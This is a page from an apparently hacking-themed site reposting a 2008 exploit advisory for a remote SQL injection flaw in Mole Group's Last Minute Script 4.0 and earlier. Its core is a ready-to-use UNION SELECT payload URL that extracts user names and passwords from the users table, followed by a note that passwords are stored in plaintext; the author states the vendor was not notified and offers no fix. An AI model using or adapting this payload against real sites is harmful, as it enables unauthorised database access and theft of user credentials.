Home | hacker invade | crack analyzes | hacker course | Exploit | encryption decipher | network management | System crack | the virus to be related | invades the examination | firewall
You are here: hacking technology > Exploit > Content
Hot Articles
Joomla Component com_con
CMailServer 5.4.6 (CMail
Boonex Dolphin 6.1.2 Mul
AuraCMS
MyBulletinBoard (MyBB)
BoonEx Ray 3.5 (sIncPath
Maian Cart 1.1 Insecure
Dreampics Builder (page)
PhotoPost vBGallery 2.4.
Joomla Component com_con
Easy Photo Gallery 2.1 X
Safari + Quicktime
trixbox (langChoice) Loc
Mole Group Last Minute S
Dreampics Builder (page)
Recommend Articles
Safari + Quicktime
CMailServer 5.4.6 (CMail
trixbox (langChoice) Loc
BrewBlogger 2.1.0.1 Arbi
Joomla Component com_con
Mole Group Last Minute S
BoonEx Ray 3.5 (sIncPath
Dreampics Builder (page)
Download Accelerator Plu
OllyDBG v1.10 and ImpREC
DreamNews Manager (id) R
gapicms 9.0.2 (dirDepth)
Million Pixels 3 (id_cat
Maian Cart 1.1 Insecure
Maian Music 1.0 Insecure
New Articles
10,000 Web pages rigged
New threats to Content S
Malicious code discovere
Justification and Return
Malware found on pro-Tib
Don't be a victim of Cyb
Outsourcing application
Malicious JavaScript inj
Critical Vulnerability T
Smartphones pose a great
MS Windows Vista Access
FOSS Gallery Admin
Outsourcing application
Malicious JavaScript inj
Malicious JavaScript inj
Mole Group Last Minute Script
  Add date: 07/10/2008   Publishing date: 07/10/2008   Hits: 5
-[*]+================================================================================+[*]-
-[*]+        Last Minute Script <= 4.0 Remote SQL Injection Vulnerability     +[*]-
-[*]+================================================================================+[*]-



[*] Discovered By: t0pP8uZz
[*] Discovered On: 8 JULY 2008
[*] Script Download: http://www.mole-group.com/content/view/31/45/
[*] DORK: N/A



[*] Vendor Has Not Been Notified!



[*] DESCRIPTION:

Last Minute Script 4.0 (and all prior versions) suffer from a multirow SQL injection flaw,
This allows the remote attacker to execute arbitrary MySQL querys, and possibly gaining access
to confidential information.

below is a example.



[*] SQL Injection:

http://site.com/index.php?cid=-1/**/UNION/**/ALL/**/SELECT/**/CONVERT(CONCAT(name,0x3a,password,0x3C62723E)/**/using/**/latin1),2,3,4/**/FROM/**/users/*



[*] NOTE/TIP:

passwords are in plaintext.

There are also other SQL injections around the site which i have found, So no one even bother to post has seperate vulns.



[*] GREETZ:

milw0rm.com, h4ck-y0u.org, Offensive-Security.com, CipherCrew !



[-] Peace...

...t0pP8uZz !



-[*]+================================================================================+[*]-
-[*]+        Last Minute Script <= 4.0 Remote SQL Injection Vulnerability     +[*]-
-[*]+================================================================================+[*]-
Prev:Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln Next:BoonEx Ray 3.5 (sIncPath) Remote File Inclusion Vulnerability

Comment:

Category: Home > Exploit
Home